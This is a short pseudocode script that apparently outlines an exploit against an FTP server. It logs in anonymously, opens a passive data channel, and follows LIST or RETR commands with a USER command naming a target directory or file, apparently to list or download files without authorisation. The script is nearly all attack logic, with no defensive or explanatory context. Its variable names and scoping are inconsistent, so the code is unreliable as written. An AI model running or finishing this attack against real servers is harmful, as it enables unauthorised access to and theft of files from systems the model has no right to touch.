main():
	active_connection = connect(target_ip, port)
	active_connection.send('USER anonymous')
	active_connection.send('PASS some_password')
	
	response = active_connection.send('EPSV') // requesting passive mode for data request
	pasive_port = getPassivePort(response)
	passive_connection = connect( target_ip, passive_port)
	
	getList(our_target_directory)
	//Or 
	getFile(valid_file_path, our_target_file_path)
	
	Data = Passive_connection.receive()
	Print(data)
	

getList(our_target_directory):
	active_connection.send('LIST /')
	active_connection.send('USER our_target_directory')
	
getFile(valid_file_path, our_target_file_path):
	active_connection.send('RETR valid_file_path')
	active_connection.send('USER our_target_file_path')

    